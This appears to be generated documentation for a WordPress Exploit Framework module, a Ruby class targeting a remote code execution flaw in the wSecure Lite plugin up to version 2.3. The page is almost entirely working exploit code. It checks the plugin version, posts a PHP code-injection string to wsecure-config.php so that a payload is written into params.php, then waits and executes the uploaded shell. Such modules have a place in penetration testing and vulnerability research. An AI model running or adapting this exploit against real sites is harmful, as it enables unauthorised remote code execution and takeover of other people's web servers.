class Wpxf::Exploit::WsecureLiteShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/wsecure_lite_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'wSecure Lite <= 2.3 Shell Upload',
    author: [
      'White Fir Design', # Disclosure
      'rastating'         # WPXF module
    ],
    references: [
      ['WPVDB', '8594'],
      ['URL', 'https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/']
    ],
    date: 'Aug 02 2016'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/shell/wsecure_lite_shell_upload.rb, line 27
def check
  readme = normalize_uri(plugin_url, 'readme.txt')
  check_version_from_custom_file(readme, /Version\s(\d\.\d)\s\-/, '2.4')
end
execute_payload(payload_url) click to toggle source
# File lib/wpxf/modules/exploit/shell/wsecure_lite_shell_upload.rb, line 51
def execute_payload(payload_url)
  # The file handle from the request to wsecure-config.php doesn't seem to close right away
  # so a delay is required before accessing params.php in order to execute the payload.
  sleep(5)
  super(payload_url)
end
payload_body_builder() click to toggle source
# File lib/wpxf/modules/exploit/shell/wsecure_lite_shell_upload.rb, line 36
def payload_body_builder
  builder = Wpxf::Utility::BodyBuilder.new
  builder.add_field('wsecure_action', 'update')
  builder.add_field('publish', payload_field_value)
  builder
end
payload_field_value() click to toggle source
# File lib/wpxf/modules/exploit/shell/wsecure_lite_shell_upload.rb, line 32
def payload_field_value
  "\";} ?> #{payload.encoded} <?php class #{Utility::Text.rand_alpha(5)} { var $#{Utility::Text.rand_alpha(10)}=\""
end
plugin_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/wsecure_lite_shell_upload.rb, line 23
def plugin_url
  normalize_uri(wordpress_url_plugins, 'wsecure')
end
uploaded_payload_location() click to toggle source
# File lib/wpxf/modules/exploit/shell/wsecure_lite_shell_upload.rb, line 47
def uploaded_payload_location
  normalize_uri(plugin_url, 'params.php')
end
uploader_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/wsecure_lite_shell_upload.rb, line 43
def uploader_url
  normalize_uri(plugin_url, 'wsecure-config.php')
end